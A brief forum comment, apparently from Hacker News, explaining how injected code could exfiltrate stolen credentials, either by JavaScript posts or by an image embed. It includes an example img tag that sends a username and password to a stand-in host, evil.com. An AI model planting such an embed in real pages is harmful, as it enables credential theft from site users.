|
|
|
|
|
|
by Sebb767
1795 days ago
|
|
|
> How will he exfiltrate the data? With JS that posts it to another domain? Exactly. Alternatively, you can also use embeds, for example `<img src="https://evil.com/$user/$password" >`. If you have your code running and the credentials, exfiltration is no longer a problem. |
|
|